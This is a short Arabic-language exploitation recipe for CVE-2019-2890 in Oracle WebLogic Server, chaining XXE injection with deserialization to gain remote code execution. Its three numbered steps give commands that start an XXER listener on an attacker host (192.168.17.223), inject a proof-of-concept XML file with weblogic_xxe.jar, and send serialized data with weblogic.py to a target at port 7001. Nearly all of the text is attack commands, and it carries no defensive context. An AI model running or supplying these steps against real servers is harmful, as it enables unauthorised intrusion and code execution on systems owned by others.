
استغلال لثغرة CVE-2019-2890 يستهدف خادم Oracle WebLogic Server عبر حقن XXE وإلغاء التسلسل، مما يتيح تنفيذ الأكواد عن بُعد من خلال حمولات مصممة خصيصًا.
1)تشغيل أداة XXER python xxer.py -H 192.168.17.223
2)ضع POC الخاص بـ xxer في ملف xx.xml، واستبدل البيانات المسلسلة، ثم احقن POC الخاص بـ xxer؛ java -jar weblogic_xxe.jar xx.xml
3)استخدم weblogic.py من أداة java-deserialization-exploit لإرسال البيانات إلى خادم weblogic python weblogic.py 192.168.17.222 7001 weblogic